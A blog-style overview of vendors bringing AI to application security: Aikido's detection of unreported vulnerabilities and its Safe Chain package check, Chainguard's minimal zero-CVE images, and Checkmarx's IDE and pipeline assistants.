These days, AI is changing how we keep software safe. At big security shows like Black Hat USA 2025 and DEF CON 33, experts talked about AI not just as a trend, but as the backbone of modern security tools. Companies are now using AI at every step in the software development process, from finding vulnerabilities to making code safer and faster.

AI is helping developers identify problems early. Some startups are using large language models to spot “shadow-patched” vulnerabilities. These are bugs in open-source code that don’t get official reports or CVEs but can still put apps at risk. Mackenzie Jackson from Aikido Software explains that AI can scan commit histories to find suspicious changes that look like security fixes—so organizations can catch issues that traditional tools might miss.

Making Open-Source Code Safer with AI

Open-source software is everywhere, but not all vulnerabilities are tracked properly. Aikido Security uses AI to monitor millions of open-source projects daily. They look for hidden threats like malicious code, credential stealers, or obfuscated malware. Since launching in 2024, they’ve found over 500 previously unknown vulnerabilities, many of which never received official CVEs. This means relying only on standard feeds can leave gaps in security.

To make it easier for developers, Aikido created Safe Chain. It’s a tool that wraps around common package managers like npm, yarn, and pnpm. Safe Chain automatically checks each package before it’s installed, warning developers if something looks suspicious. This helps keep dangerous code out of apps without slowing down the development process. It’s a smart way to add security right into daily coding habits.

Building Trust with Secure, Minimal Software

Chainguard offers a different approach. Founded by former Google engineers, they make secure, minimal software packages that are built directly from upstream sources. Their goal is to create “zero-CVE” images, meaning they don’t have known vulnerabilities when used. They update and rebuild these images quickly—usually within 48 hours when a new security issue appears.

Chainguard’s method involves creating base operating system images, libraries, and virtual machines that are stripped down and verified. This way, developers can start with a clean, trustworthy foundation. Their container images and VM appliances are designed for cloud and Kubernetes environments, providing a solid security baseline from the start. This “farm-to-table” process ensures vulnerabilities are caught early, often before deployment.

Embedding Security into Developer Workflows

Checkmarx is another big name making waves. They introduced new AI tools that give developers real-time security advice while coding. For example, Checkmarx One Developer Assist integrates into popular IDEs and helps spot vulnerabilities as code is written. This means fixing issues early, rather than after the code is finished.

They also previewed upcoming AI agents that work in CI/CD pipelines. Policy Assist will find and fix vulnerabilities during the build process, while Insights Assist will provide ongoing risk reports. Checkmarx’s platform combines various testing methods—like static analysis, software composition analysis, and API security—to give a comprehensive security picture. This makes it easier for teams to build safer software from day one.

All these efforts show a clear trend: security isn’t just about catching problems anymore. It’s about preventing them, fixing them quickly, and integrating safety checks smoothly into everyday workflows. AI is making this possible, helping developers keep pace with the fast-moving world of software creation while staying secure.

As these companies and tools continue to evolve, it’s clear that AI will play a vital role in shaping the future of application security. The goal is simple: make security faster, more accurate, and less disruptive—so that protecting software becomes a natural part of the development process.

Inspired by

• https://www.infoworld.com/article/4047160/8-vendors-bringing-ai-to-devsecops-and-application-security.html

Sources

• gmpg.org
• aikido.dev
• nist.gov
• cve.org
• craftcms.com